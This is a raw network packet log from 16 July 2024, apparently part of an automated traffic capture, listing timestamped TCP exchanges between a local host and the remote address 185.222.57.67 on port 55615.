Jul 16, 2024 19:57:18.656929016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.656934977 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657023907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657028913 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657068014 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657171011 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657217979 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657222986 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657273054 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657387018 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657392979 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657510996 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657516956 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657529116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657540083 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657552958 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657557964 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657679081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657727003 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657740116 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657757044 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657762051 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657773972 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657836914 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657843113 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657927036 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657932997 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.657938004 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658046961 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658052921 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658063889 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658070087 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658075094 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658080101 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658133984 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658150911 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658205032 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658210993 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658217907 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658274889 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658349037 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658499002 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658504963 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658793926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658807039 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658812046 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658818007 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658829927 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658834934 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658839941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658854008 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658859015 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658864021 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658879042 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658884048 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658895969 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658901930 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658916950 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658924103 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658927917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658932924 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658956051 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658961058 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658972025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658978939 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658989906 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.658994913 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659007072 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659359932 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659365892 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659370899 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659375906 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659380913 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659385920 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659390926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659403086 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659408092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659413099 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659425020 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659430027 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659435034 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659440041 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659451962 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659456968 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659470081 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659476042 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659477949 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659482002 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659492970 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659497976 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.659508944 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660401106 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660407066 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660419941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660424948 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660437107 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660443068 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660456896 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660470963 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660475969 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660487890 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660495996 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660507917 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660512924 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660517931 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660522938 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660535097 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660538912 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660552025 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660557032 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660568953 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660573959 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660588026 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660593033 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660598040 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660604954 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660610914 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660615921 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660620928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660633087 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660639048 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660651922 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660656929 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660670042 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660675049 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660686016 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660691023 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660706043 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660711050 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660726070 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660732031 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660737038 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660742998 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660754919 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660759926 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660772085 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660777092 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660789967 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660794020 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660805941 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660811901 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660826921 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660831928 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660844088 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660847902 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660861015 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660866022 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660877943 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:18.660882950 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:19.192188978 CEST	55615	49720	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:19.206098080 CEST	49720	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:22.146053076 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:22.155297995 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.319962978 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.320446968 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:22.325273037 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.510926008 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.510935068 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.510946035 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.511007071 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.511012077 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.511017084 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:22.511032104 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:22.511100054 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.194374084 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.194643021 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.199589014 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.199707031 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.200037003 CEST	55615	49714	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.200186968 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.200203896 CEST	49714	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.205319881 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.549364090 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.555337906 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555346966 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555418968 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.555733919 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555740118 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555808067 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.555898905 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555908918 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555912971 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555917025 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555921078 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555932045 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.555996895 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.560436964 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560529947 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560559988 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.560594082 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.560774088 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560780048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560789108 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560870886 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.560899973 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.560972929 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.605566025 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.605724096 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.639329910 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.639532089 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.644680023 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644685984 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644726038 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644792080 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644795895 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644799948 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644799948 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.644864082 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.644907951 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644968987 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644973993 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644978046 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.644980907 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645011902 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.645015001 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645061970 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.645176888 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645181894 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645416021 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645421028 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645430088 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645433903 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645442963 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645447016 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645459890 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.645464897 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645469904 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645479918 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645484924 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645507097 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645515919 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.645518064 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.645581007 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.649893999 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.649900913 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.649920940 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.649976969 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650012970 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650018930 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650085926 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650101900 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650167942 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650176048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650207996 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650213957 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650219917 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650224924 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650247097 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650283098 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650341034 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650402069 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650405884 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650433064 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650453091 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650511980 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650532961 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650574923 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650621891 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650743008 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650748014 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650758982 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650763035 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650810957 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650827885 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650876999 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.650890112 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650913954 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650975943 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.650976896 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651077032 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651082039 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651092052 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651118994 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651158094 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651190042 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651195049 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651205063 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651262045 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651266098 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651276112 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651309013 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651329994 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651344061 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651366949 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651377916 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651424885 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651432037 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651456118 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651498079 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651510000 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651515007 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651526928 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651535988 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651539087 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651597977 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651643991 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651716948 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.651719093 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651725054 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.651902914 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.652061939 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652066946 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652076006 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652080059 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652090073 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652093887 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652101994 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652106047 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652110100 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652112961 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652117014 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652121067 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652124882 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.652138948 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.652179003 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.654831886 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654891968 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.654901981 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654906988 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654916048 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654953003 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654963017 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654967070 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.654969931 CEST	49722	55615	192.168.2.5	185.222.57.67
Jul 16, 2024 19:57:25.654997110 CEST	55615	49722	185.222.57.67	192.168.2.5
Jul 16, 2024 19:57:25.655002117 CEST	55615	49722	185.222.57.67	192.168.2.5
